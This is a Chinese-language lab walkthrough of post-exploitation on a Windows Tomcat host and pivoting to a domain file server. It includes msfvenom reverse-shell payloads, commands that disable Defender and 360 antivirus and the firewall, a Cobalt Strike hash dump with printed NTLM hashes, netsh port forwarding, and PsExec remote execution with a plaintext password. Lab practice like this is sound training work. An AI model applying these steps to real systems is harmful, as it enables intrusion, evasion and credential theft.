锐单电子商城 , 一站式电子元器件采购平台!
  • 电话:400-990-0325

暗月渗透实战靶场-项目八(下)

时间:2022-11-23 03:30:00 d142对射式光电传感器连接器df1ec

00x6-tomcat主机发现

tomcat收集主机信息

网卡信息

ipconfig /all 

image-20220207213137710

主机名tomcat-web

两块网卡

路由器信息

arp -a 

结果

接口: 10.10.1.129 --- 0x6   Internet 地址         物理地址              类型   10.10.1.1             00-50-56-c0-00-12     动态           10.10.1.255           ff-ff-ff-ff-ff-ff     静态           224.0.0.22            01-00-5e-00-00-16     静态           224.0.0.251           01-00-5e-00-00-fb     静态           224.0.0.252           01-00-5e-00-00-fc     静态           239.255.255.250       01-00-5e-7f-ff-fa     静态           255.255.255.255       ff-ff-ff-ff-ff-ff     静态          接口: 192.168.1.124 --- 0xc   Internet 地址         物理地址              类型   192.168.1.1           00-50-56-c0-00-08     动态           192.168.1.130         00-0c-29-90-71-c3     动态           192.168.1.254         00-50-56-fc-85-ce     动态           192.168.1.255         ff-ff-ff-ff-ff-ff     静态           224.0.0.22            01-00-5e-00-00-16     静态           224.0.0.252           01-00-5e-00-00-fc     静态           239.255.255.250       01-00-5e-7f-ff-fa     静态          

端口信息

netstat -ano 

结果

netstat -ano  Connection list ===============      Proto  Local address                    Remote address      State        User  Inode  PID/Program name     -----  -------------                    --------------      -----        ----  -----  ----------------     tcp    0.0.0.0:135                      0.0.0.0:*           LISTEN       0     0      796/svchost.exe     tcp    0.0.0.0:445                      0.0.0.0:*           LISTEN       0     0      4/System     tcp    0.0.0.0:3306                     0.0.0.0:*           LISTEN       0     0      1920/mysqld.exe     tcp    0.0.0.0:5985                     0.0.0.0:*           LISTEN       0     0      4/System     tcp    0.0.0.0:8009                     0.0.0.0:*           LISTEN       0     0      5528/java.exe     tcp    0.0.0.0:8080                     0.0.0.0:*           LISTEN       0     0      5528/java.exe     tcp    0.0.0.0:47001                    0.0.0.0:*           LISTEN       0     0      4/System     tcp    0.0.0.0:49664                    0.0.0.0:*           LISTEN       0     0      516/wininit.exe     tcp    0.0.0.0:49665                    0.0.0.0:*           LISTEN       0     0      968/svchost.exe     tcp    0.0.0.0:49666                    0.0.0.0:*           LISTEN       0     0      928/svchost.exe     tcp    0.0.0.0:49668                    0.0.0.0:*           LISTEN       0     0      1720/spoolsv.exe     tcp    0.0.0.0:49669                    0.0.0.0:*           LISTEN       0     0      648/services.exe     tcp    0.0.0.0:49675                    0.0.0.0:*           LISTEN       0     0      656/lsass.exe     tcp    10.10.1.129:139                  0.0.0.0:*           LISTEN       0     0      4/System     tcp    127.0.0.1:3306                   127.0.0.1:50617     ESTABLISHED  0     0      1920/mysqld.exe     tcp    127.0.0.1:3306                   127.0.0.1:53060     ESTABLISHED  0     0      1920/mysqld.exe     tcp    127.0.0.1:3306                   127.0.0.1:53068     ESTABLISHED  0     0      1920/mysqld.exe     tcp    127.0.0.1:3306                   127.0.0.1:54388     ESTABLISHED  0     0      1920/mysqld.exe     tcp    127.0.0.1:8005                   0.0.0.0:*           LISTEN       0     0      5528/java.exe     tcp    127.0.0.1:49773                  127.0.0.1:49774     ESTABLISHED  0     0      5528/java.exe     tcp    127.0.0.1:49774                  127.0.0.1:49773     ESTABLISHED  0     0      5528/java.exe     tcp    127.0.0.1:49775                  127.0.0.1:49776     ESTABLISHED  0     0      5528/java.exe     tcp    127.0.0.1:49776                  127.0.0.1:49775     ESTABLISHED  0     0      5528/java.exe     tcp    127.0.0.1:49793                  127.0.0.1:49794     ESTABLISHED  0     0      5528/java.exe     tcp    127.0.0.1:49794                  127.0.0.1:49793     ESTABLISHED  0     0      5528/java.exe     tcp    127.0.0.1:49795                  127.0.0.1:49796     ESTABLISHED  0     0      5528/java.exe     tcp    127.0.0.1:49796                  127.0.0.1:49795     ESTABLISHED  0     0      5528/java.exe     tcp    127.0.0.1:49797                  127.0.0.1:49798     ESTABLISHED  0     0      5528/javaexe
    tcp    127.0.0.1:49798                  127.0.0.1:49797     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49799                  127.0.0.1:49800     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:49800                  127.0.0.1:49799     ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:50617                  127.0.0.1:3306      ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:53060                  127.0.0.1:3306      ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:53068                  127.0.0.1:3306      ESTABLISHED  0     0      5528/java.exe
    tcp    127.0.0.1:54388                  127.0.0.1:3306      ESTABLISHED  0     0      5528/java.exe
    tcp    192.168.1.124:139                0.0.0.0:*           LISTEN       0     0      4/System
    tcp    192.168.1.124:8080               192.168.1.1:57761   TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.1.124:50999              192.168.1.130:8888  ESTABLISHED  0     0      5528/java.exe
    tcp    192.168.1.124:54571              192.168.1.130:8888  ESTABLISHED  0     0      5528/java.exe
    tcp    192.168.1.124:57240              192.168.1.130:6068  ESTABLISHED  0     0      7444/B6Ehp013.exe
    tcp6   :::135                           :::*                LISTEN       0     0      796/svchost.exe
    tcp6   :::445                           :::*                LISTEN       0     0      4/System
    tcp6   :::3306                          :::*                LISTEN       0     0      1920/mysqld.exe
    tcp6   :::3389                          :::*                LISTEN       0     0      9336/svchost.exe
    tcp6   :::5985                          :::*                LISTEN       0     0      4/System
    tcp6   :::8009                          :::*                LISTEN       0     0      5528/java.exe
    tcp6   :::8080                          :::*                LISTEN       0     0      5528/java.exe
    tcp6   :::47001                         :::*                LISTEN       0     0      4/System
    tcp6   :::49664                         :::*                LISTEN       0     0      516/wininit.exe
    tcp6   :::49665                         :::*                LISTEN       0     0      968/svchost.exe
    tcp6   :::49666                         :::*                LISTEN       0     0      928/svchost.exe
    tcp6   :::49668                         :::*                LISTEN       0     0      1720/spoolsv.exe
    tcp6   :::49669                         :::*                LISTEN       0     0      648/services.exe
    tcp6   :::49675                         :::*                LISTEN       0     0      656/lsass.exe
    udp    0.0.0.0:3389                     0.0.0.0:*                        0     0      9336/svchost.exe
    udp    0.0.0.0:5050                     0.0.0.0:*                        0     0      760/svchost.exe
    udp    0.0.0.0:5353                     0.0.0.0:*                        0     0      1092/svchost.exe
    udp    0.0.0.0:5355                     0.0.0.0:*                        0     0      1092/svchost.exe
    udp    10.10.1.129:137                  0.0.0.0:*                        0     0      4/System
    udp    10.10.1.129:138                  0.0.0.0:*                        0     0      4/System
    udp    10.10.1.129:1900                 0.0.0.0:*                        0     0      3816/svchost.exe
    udp    10.10.1.129:50902                0.0.0.0:*                        0     0      3816/svchost.exe
    udp    127.0.0.1:1900                   0.0.0.0:*                        0     0      3816/svchost.exe
    udp    127.0.0.1:50903                  0.0.0.0:*                        0     0      3816/svchost.exe
    udp    192.168.1.124:137                0.0.0.0:*                        0     0      4/System
    udp    192.168.1.124:138                0.0.0.0:*                        0     0      4/System
    udp    192.168.1.124:1900               0.0.0.0:*                        0     0      3816/svchost.exe
    udp    192.168.1.124:50901              0.0.0.0:*                        0     0      3816/svchost.exe
    udp6   :::3389                          :::*                             0     0      9336/svchost.exe
    udp6   :::5353                          :::*                             0     0      1092/svchost.exe
    udp6   :::5355                          :::*                             0     0      1092/svchost.exe
    udp6   ::1:1900                         :::*                             0     0      3816/svchost.exe
    udp6   ::1:50900                        :::*                             0     0      3816/svchost.exe
    udp6   fe80::1479:3673:41d4:fdd7:1900   :::*                             0     0      3816/svchost.exe
    udp6   fe80::1479:3673:41d4:fdd7:50899  :::*                             0     0      3816/svchost.exe
    udp6   fe80::f1f5:a71e:7e7:ee7c:1900    :::*                             0     0      3816/svchost.exe
    udp6   fe80::f1f5:a71e:7e7:ee7c:50898   :::*                             0     0      3816/svchost.exe


主机信息

systeminfo

结果

C:\tomcat\bin>systeminfo
systeminfo

Host Name:                 TOMCAT-WEB     #计算机名称
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows 用户
Registered Organization:
Product ID:                00377-60000-00000-AA810
Original Install Date:     2020/11/3, 23:43:25
System Boot Time:          2022/2/3, 11:34:00
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
                           [02]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16722896.B64.2008100651, 2020/8/10
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             zh-cn;Chinese (China)
Input Locale:              zh-cn;Chinese (China)
Time Zone:                 (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     3,327 MB
Available Physical Memory: 337 MB
Virtual Memory: Max Size:  8,454 MB
Virtual Memory: Available: 1,630 MB
Virtual Memory: In Use:    6,824 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP          #不在域控里面
Logon Server:              \\TOMCAT-WEB
Hotfix(s):                 2 Hotfix(s) Installed.      #程序补丁
                           [01]: KB3199986
                           [02]: KB3200970
Network Card(s):           2 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.1.124
                                 [02]: fe80::f1f5:a71e:7e7:ee7c
                           [02]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet1
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.1.129
                                 [02]: fe80::1479:3673:41d4:fdd7
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\tomcat\bin>

查看开启的服务

net start

结果

C:\tomcat\webapps\ROOT\uploads\1>net start
net start
These Windows services are started:

   360 ɱ▒▒ʵʱ▒▒▒▒▒▒ط▒▒▒
   Application Information
   Background Tasks Infrastructure Service
   Base Filtering Engine
   CDPUserSvc_11fd67
   CNG Key Isolation
   COM+ Event System
   COM+ System Application
   Connected User Experiences and Telemetry
   Contact Data_11fd67
   CoreMessaging
   Credential Manager
   Cryptographic Services
   DCOM Server Process Launcher
   Device Setup Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Geolocation Service
   Group Policy Client
   IP Helper
   IPsec Policy Agent
   Local Session Manager
   MYSQL56
   Network Connection Broker
   Network Connections
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Plug and Play
   Power
   Print Spooler
   Program Compatibility Assistant Service
   Remote Access Connection Manager
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Secondary Logon
   Secure Socket Tunneling Protocol Service
   Security Accounts Manager
   Server
   Shell Hardware Detection
   SSDP Discovery
   State Repository Service
   Storage Service
   System Event Notification Service
   System Events Broker
   Task Scheduler
   TCP/IP NetBIOS Helper
   Themes
   Tile Data model server
   Time Broker
   User Access Logging Service
   User Data Access_11fd67
   User Data Storage_11fd67
   User Manager
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Connection Manager
   Windows Driver Foundation - User-mode Driver Framework
   Windows Event Log
   Windows Firewall
   Windows Font Cache Service
   Windows Management Instrumentation
   Windows Remote Management (WS-Management)
   Windows ▒▒▒▒֪ͨϵͳ▒▒▒▒
   Windows ▒▒▒֤▒▒▒▒▒▒▒▒▒
   WinHTTP Web Proxy Auto-Discovery Service
   Workstation
   ▒▒▒▒▒
   ͬ▒▒▒▒▒_11fd67
   ▒▒▒ߵ▒▒▒▒▒▒▒
   ▒▒▒▒豸ƽ̨▒▒▒▒

The command completed successfully.


C:\tomcat\webapps\ROOT\uploads\1>net user
net user

User accounts for \\TOMCAT-WEB

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
The command completed successfully.



查看进程

tasklist /svc

结果

C:\tomcat\bin>tasklist /svc
tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       352 N/A
csrss.exe                      420 N/A
wininit.exe                    516 N/A
csrss.exe                      524 N/A
winlogon.exe                   596 N/A
services.exe                   648 N/A
lsass.exe                      656 KeyIso, SamSs, VaultSvc
svchost.exe                    740 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    796 RpcEptMapper, RpcSs
dwm.exe                        876 N/A
svchost.exe                    928 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
                                   ProfSvc, RasMan, Schedule, seclogon, SENS,
                                   ShellHWDetection, Themes, UserManager,
                                   Winmgmt, WpnService
svchost.exe                    952 NcbService, Netman, PcaSvc, StorSvc,
                                   TrkWks, UALSVC, WdiSystemHost, wudfsvc
svchost.exe                    968 Dhcp, EventLog, lmhosts, RmSvc,
                                   TimeBrokerSvc
svchost.exe                     76 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                    760 CDPSvc, EventSystem, FontCache,
                                   LicenseManager, netprofm, nsi, SstpSvc,
                                   WdiServiceHost, WinHttpAutoProxySvc
svchost.exe                   1092 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
360rps.exe                    1128 360rp             #360杀毒
svchost.exe                   1144 Wcmsvc
ZhuDongFangYu.exe             1156 ZhuDongFangYu
spoolsv.exe                   1720 Spooler
svchost.exe                   1780 DiagTrack
svchost.exe                   1832 StateRepository, tiledatamodelsvc
vmtoolsd.exe                  1844 VMTools
svchost.exe                   1868 LanmanServer
mysqld.exe                    1920 MYSQL56
VGAuthService.exe             1932 VGAuthService
MsMpEng.exe                   1948 WinDefend
svchost.exe                   2248 PolicyAgent
dllhost.exe                   2584 COMSysApp
msdtc.exe                     2808 MSDTC
WmiPrvSE.exe                  3000 N/A
WmiPrvSE.exe                  3664 N/A
svchost.exe                   3816 SSDPSRV
RuntimeBroker.exe             2340 N/A
sihost.exe                    2540 N/A
svchost.exe                   3524 CDPUserSvc_11fd67, OneSyncSvc_11fd67,
                                   PimIndexMaintenanceSvc_11fd67,
                                   UnistoreSvc_11fd67, UserDataSvc_11fd67
taskhostw.exe                 3876 N/A
ChsIME.exe                     884 N/A
explorer.exe                  3784 N/A
360rp.exe                     3808 N/A
360sd.exe                      872 N/A
ShellExperienceHost.exe       2576 N/A
SearchUI.exe                  2516 N/A
ServerManager.exe             4140 N/A
360Tray.exe                   4320 N/A
vm3dservice.exe               4812 N/A
vmtoolsd.exe                  4932 N/A
java.exe                      5528 N/A
conhost.exe                   5588 N/A
SoftMgrLite.exe               5192 N/A
ApplicationFrameHost.exe      4408 N/A
taskhostw.exe                 7116 N/A
MySQLInstallerConsole.exe     1672 N/A
conhost.exe                   6968 N/A
cmd.exe                       7204 N/A
conhost.exe                   9440 N/A
SimpleIME.exe                 9784 N/A
MpCmdRun.exe                 10216 N/A
HelpPane.exe                  9312 N/A
360Safe.exe                   8888 N/A          #360安全
360leakfixer.exe              9612 N/A          #360杀毒
SimpleIME.exe                 5780 N/A
sublime_text.exe               940 N/A
plugin_host.exe               8972 N/A
dllhost.exe                   6728 N/A
MpUXSrv.exe                  10052 N/A
MSASCui.exe                   8968 N/A
MSASCuiL.exe                 10936 N/A
iexplore.exe                 10944 N/A
iexplore.exe                 10444 N/A
wdswfsafe.exe                10080 N/A           #360杀毒-网盾
cmd.exe                      10272 N/A
conhost.exe                  10548 N/A
cmd.exe                       4420 N/A
conhost.exe                   3404 N/A
tasklist.exe                 10892 N/A

C:\tomcat\bin>



发现的杀软
360sd.exe:360杀毒
360rp.exe:360杀毒
360safe.exe:360安全卫士
360tray.exe:360实时保护
zhudongfangyu.exe:360主动防御
wdswfsafe.exe:360杀毒-网盾
msmpeng.exe:windows defender
mpcmdrun.exe:windows defender
msascui.exe:windows defender
msascuil.exe:windows defender

关闭windows Defeder

上传

执行
DefenderSwitch.exe -off

成功关闭

关闭360安全卫士

上传

执行

进程对比
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          4 K
System                           4 Services                   0        140 K
smss.exe                       352 Services                   0      1,196 K
csrss.exe                      420 Services                   0      4,192 K
wininit.exe                    516 Services                   0      5,076 K
csrss.exe                      524 Console                    1     11,632 K
winlogon.exe                   596 Console                    1     12,484 K
services.exe                   648 Services                   0      9,784 K
lsass.exe                      656 Services                   0     15,344 K
svchost.exe                    740 Services                   0     20,124 K
svchost.exe                    796 Services                   0     11,760 K
dwm.exe                        876 Console                    1    145,812 K
svchost.exe                    928 Services                   0     58,768 K
svchost.exe                    952 Services                   0     27,092 K
svchost.exe                    968 Services                   0     27,096 K
svchost.exe                     76 Services                   0     22,840 K
svchost.exe                    760 Services                   0     27,728 K
svchost.exe                   1092 Services                   0     27,396 K
360rps.exe                    1128 Services                   0      6,684 K
svchost.exe                   1144 Services                   0      7,268 K
ZhuDongFangYu.exe             1156 Services                   0     16,016 K
spoolsv.exe                   1720 Services                   0     16,436 K
svchost.exe                   1780 Services                   0     24,400 K
svchost.exe                   1832 Services                   0     18,844 K
vmtoolsd.exe                  1844 Services                   0     22,024 K
svchost.exe                   1868 Services                   0      8,196 K
mysqld.exe                    1920 Services                   0     38,748 K
VGAuthService.exe             1932 Services                   0     10,556 K
svchost.exe                   2248 Services                   0      7,156 K
dllhost.exe                   2584 Services                   0     12,760 K
msdtc.exe                     2808 Services                   0      9,740 K
WmiPrvSE.exe                  3000 Services                   0     29,508 K
WmiPrvSE.exe                  3664 Services                   0     19,212 K
svchost.exe                   3816 Services                   0      7,256 K
RuntimeBroker.exe             2340 Console                    1     20,908 K
sihost.exe                    2540 Console                    1     21,844 K
svchost.exe                   3524 Console                    1     20,548 K
taskhostw.exe                 3876 Console                    1     18,620 K
ChsIME.exe                     884 Console                    1     17,820 K
explorer.exe                  3784 Console                    1    130,004 K
360rp.exe                     3808 Console                    1     68,948 K
360sd.exe                      872 Console                    1      6,644 K
ShellExperienceHost.exe       2576 Console                    1     44,308 K
SearchUI.exe                  2516 Console                    1     19,392 K
ServerManager.exe             4140 Console                    1     72,420 K
vm3dservice.exe               4812 Console                    1      6,068 K
vmtoolsd.exe                  4932 Console                    1     45,584 K
java.exe                      5528 Console                    1    457,948 K
conhost.exe                   5588 Console                    1     17,828 K
SoftMgrLite.exe               5192 Console                    1     22,324 K
ApplicationFrameHost.exe      4408 Console                    1     19,440 K
taskhostw.exe                 7116 Console                    1     18,952 K
MySQLInstallerConsole.exe     1672 Services                   0      2,400 K
conhost.exe                   6968 Services                   0        580 K
cmd.exe                       7204 Console                    1      2,932 K
conhost.exe                   9440 Console                    1     18,148 K
SimpleIME.exe                 9784 Console                    1     12,312 K
HelpPane.exe                  9312 Console                    1     21,476 K
SimpleIME.exe                 5780 Console                    1     13,288 K
sublime_text.exe               940 Console                    1     39,356 K
plugin_host.exe               8972 Console                    1     24,472 K
dllhost.exe                   6728 Console                    1      8,120 K
MpUXSrv.exe                  10052 Console                    1      9,348 K
MSASCui.exe                   8968 Console                    1     30,048 K
MSASCuiL.exe                 10936 Console                    1     13,592 K
iexplore.exe                 10944 Console                    1     37,652 K
iexplore.exe                 10444 Console                    1     50,108 K
wdswfsafe.exe                10080 Console                    1     14,900 K
cmd.exe                      10744 Console                    1      3,232 K
conhost.exe                  10580 Console                    1      9,652 K
svchost.exe                   9028 Services                   0      9,004 K
tasklist.exe                  9144 Console                    1      7,856 K

结果
360sd.exe:360杀毒
360rp.exe:360杀毒
zhudongfangyu.exe:360主动防御
wdswfsafe.exe:360杀毒-网盾

只能关闭360安全卫士不能关闭360杀毒

Tips
只能关闭360安全卫士不能关闭360杀毒

尝试上传msf攻击载荷

生成攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6068 -e x86/shikata_ga_nai -i 12 -f c -o payload12.c

免杀生成exe

设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6068
exploit -j

执行

成功上线

上传cs攻击载荷

生成攻击payload

免杀生成exe

上传

执行

成功上线

查看进程关闭360杀毒(刚刚只能关闭360安全卫士)

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       352 N/A
csrss.exe                      420 N/A
wininit.exe                    516 N/A
csrss.exe                      524 N/A
winlogon.exe                   596 N/A
services.exe                   648 N/A
lsass.exe                      656 KeyIso, SamSs, VaultSvc
svchost.exe                    740 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    796 RpcEptMapper, RpcSs
dwm.exe                        876 N/A
svchost.exe                    928 Appinfo, CertPropSvc, DsmSvc, gpsvc,
                                   IKEEXT, iphlpsvc, lfsvc, ProfSvc, RasMan,
                                   Schedule, seclogon, SENS, SessionEnv,
                                   ShellHWDetection, Themes, UserManager,
                                   Winmgmt, WpnService
svchost.exe                    952 NcbService, Netman, PcaSvc, ScDeviceEnum,
                                   StorSvc, TrkWks, UALSVC, UmRdpService,
                                   wudfsvc
svchost.exe                    968 Dhcp, EventLog, lmhosts, RmSvc,
                                   TimeBrokerSvc
svchost.exe                     76 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                    760 CDPSvc, EventSystem, fdPHost, FontCache,
                                   LicenseManager, netprofm, nsi, SstpSvc,
                                   WdiServiceHost, WinHttpAutoProxySvc
svchost.exe                   1092 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                   1144 Wcmsvc
spoolsv.exe                   1720 Spooler
svchost.exe                   1780 DiagTrack
svchost.exe                   1832 StateRepository, tiledatamodelsvc
vmtoolsd.exe                  1844 VMTools
svchost.exe                   1868 LanmanServer
mysqld.exe                    1920 MYSQL56
VGAuthService.exe             1932 VGAuthService
svchost.exe                   2248 PolicyAgent
dllhost.exe                   2584 COMSysApp
msdtc.exe                     2808 MSDTC
WmiPrvSE.exe                  3000 N/A
WmiPrvSE.exe                  3664 N/A
svchost.exe                   3816 SSDPSRV
RuntimeBroker.exe             2340 N/A
sihost.exe                    2540 N/A
svchost.exe                   3524 CDPUserSvc_11fd67, OneSyncSvc_11fd67,
                                   PimIndexMaintenanceSvc_11fd67,
                                   UnistoreSvc_11fd67, UserDataSvc_11fd67
taskhostw.exe                 3876 N/A
ChsIME.exe                     884 N/A
explorer.exe                  3784 N/A
ShellExperienceHost.exe       2576 N/A
SearchUI.exe                  2516 N/A
ServerManager.exe             4140 N/A
vm3dservice.exe               4812 N/A
vmtoolsd.exe                  4932 N/A
java.exe                      5528 N/A
conhost.exe                   5588 N/A
SoftMgrLite.exe               5192 N/A
ApplicationFrameHost.exe      4408 N/A
taskhostw.exe                 7116 N/A
MySQLInstallerConsole.exe     1672 N/A
conhost.exe                   6968 N/A
SimpleIME.exe                 9784 N/A
HelpPane.exe                  9312 N/A
sublime_text.exe               940 N/A
plugin_host.exe               8972 N/A
MpUXSrv.exe                  10052 N/A
iexplore.exe                 10944 N/A
iexplore.exe                 10444 N/A
cmd.exe                       7416 N/A
conhost.exe                   6760 N/A
FYifCwDC.exe                  7024 N/A
explorer.exe                 10820 N/A
cmd.exe                       4208 N/A
conhost.exe                   7220 N/A
cmd.exe                       5624 N/A
conhost.exe                   3360 N/A
svchost.exe                   9336 TermService
cmd.exe                      10156 N/A
conhost.exe                   3624 N/A
csrss.exe                     6092 N/A
winlogon.exe                  7056 N/A
LogonUI.exe                   7824 N/A
dwm.exe                       6396 N/A
rdpclip.exe                  10584 N/A
ChsIME.exe                    8596 N/A
cmd.exe                      10012 N/A
conhost.exe                   8360 N/A
SystemSettingsBroker.exe      9836 N/A
cmd.exe                        832 N/A
conhost.exe                   7436 N/A
cmd.exe                       9808 N/A
conhost.exe                   5804 N/A
PsExec.exe                    8132 N/A
cmd.exe                       8532 N/A
conhost.exe                   4172 N/A
cmd.exe                      10644 N/A
conhost.exe                   2072 N/A
tasklist.exe                  3428 N/A

对 tomcat-web 详细查看

密码

hashdump

结果

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82553 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

解密

内网探测

portscan 10.10.1.0-10.10.1.254 139 arp 1024

结果

beacon> portscan 10.10.1.0-10.10.1.254 139 arp 1024
[*] Tasked beacon to scan ports 139 on 10.10.1.0-10.10.1.254
[+] host called home, sent: 75377 bytes
[+] received output:
(ARP) Target '10.10.1.1' is alive. 00-50-56-C0-00-12

[+] received output:
(ARP) Target '10.10.1.128' is alive. 00-0C-29-76-60-C6
(ARP) Target '10.10.1.129' is alive. 00-0C-29-49-BB-5D

[+] received output:
10.10.1.129:139
10.10.1.1:139

[+] received output:
Scanner module is complete


发现主机10.10.1.128

使用psexec上线其他主机

获取到tomcat机器的密码凭证、也已经探测到10.10.1.128机器的存在、使用CobalStrike的psexec工具进行批量上线内网机器

参考
http://redteam.today/2019/11/22/cobaltstrike%E5%9C%A8%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E4%B8%AD%E7%9A%84%E4%B8%8A%E7%BA%BF%E6%8A%80%E5%B7%A7/
https://blog.csdn.net/weixin_44276628/article/details/104782376
https://github.com/aleenzz/Cobalt_Strike_wiki/blob/master/%E7%AC%AC%E5%8D%81%E4%BA%94%E8%8A%82%5B%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F%20%5D.md

上线失败

00x7-发现域内主机

对1.128机器信息搜集

常用端口探测

proxychains4 sudo nmap -sT -Pn 10.10.1.128 -p 80,88,21,139,23,445,3389 --open

只开放了445端口

使用portscan扫描

portscan 10.10.1.128 445 arp
结果
beacon> portscan 10.10.1.128 445 arp
[*] Tasked beacon to scan ports 445 on 10.10.1.128
[+] host called home, sent: 75377 bytes
[+] received output:
(ARP) Target '10.10.1.128' is alive. 00-0C-29-76-60-C6
10.10.1.128:445 (platform: 500 version: 10.0 name: FILESERVER domain: FBI)
Scanner module is complete

主机名:FILESERVER

所属域:FBI

使用nmap进行探测

proxychains4 sudo nmap -A -p 445 -O 10.10.1.128

结果

445端口、机器为windows server 2008

尝试访问内网1.128机器

dir \\10.10.1.128\c$

结果

能够访问

开启tomcat主机的3389端口

进行远程访问

查看

尝试连接

失败

直接连接是连接不上的、查看能否访问

做个转发

portfwd add -l 3389 -p 3389 -r 192.168.1.124

将tomcat机器上的3389的流量转发到自己本机的3389端口

登录

rdesktop 127.0.0.1:3389

成功

将所有的防御都关掉、我们前面已经将defeder、360安全卫士关闭了、

小结

00x8-拿下内网域1.128机器会话

前面我们已经获取了1.124-tomcat机器的cs与msf的会话、同时还获取了tomcat机器的3389远程访问的权限、对于1.128内网file server机器只是开启了一个445的端口、这里我们采用的是进行反向连接的方法

MSF反向连接

先生成连接10.10.1.129的msf攻击载荷

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.129 LPORT=6068 -e x86/shikata_ga_nai -i 12 -f c -o 128to129.c

生成免杀exe

上传

复制到10.10.1.128的fileserver的机器上

copy 128to129.exe \\10.10.1.128\c$

查看

流量转发

将129机器上的6068端口转发到攻击机器192.168.1.130的6068端口

netsh interface portproxy add v4tov4 listenport=6068 connectport=6068 connectaddress=192.168.1.130

查看转发情况

netsh interface portproxy show all

Tips

如果上面的转发后、依旧是没有上面的规则、说明是防火墙没有关闭

禁用系统防火墙

netsh firewall set opmode disable

启用防火墙

netsh firewall set opmode enable

攻击机做监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6068
exploit -j

运行

在10.10.1.128-fileserver机器上运行攻击载荷

在namp上我们查看到的OA版本是Windows server 2008、at命令就无法使用了

上面我们在CobalStrike尝试使用psexec进行上线内网主机发现是失败的、但是这种方法是可以的、应该是目标机器不出网的原因、使用工具进行上线。

参考
https://www.ajsafe.com/news/25.html

使用工具
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
下载

上传工具

再次运行

PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/128to129.exe

这个最好是在远控上执行、因为第一次使用psexec.exe会有一个agree的弹窗需要确认

在终端session上无法执行

msf成功上线

信息

00x9-域内信息搜集

杀软扫描

tasklist /svc

结果

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       316 N/A
csrss.exe                      384 N/A
wininit.exe                    480 N/A
csrss.exe                      488 N/A
winlogon.exe                   556 N/A
services.exe                   604 N/A
lsass.exe                      612 KeyIso, Netlogon, SamSs, VaultSvc
svchost.exe                    700 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    760 RpcEptMapper, RpcSs
dwm.exe                        844 N/A
svchost.exe                    908 NcbService, Netman, PcaSvc, StorSvc,
                                   TrkWks, UALSVC, wudfsvc
svchost.exe                    916 Dhcp, EventLog, lmhosts, TimeBrokerSvc
svchost.exe                    924 CDPSvc, EventSystem, FontCache,
                                   LicenseManager, netprofm, nsi, W32Time,
                                   WinHttpAutoProxySvc
svchost.exe                   1012 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                   1020 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
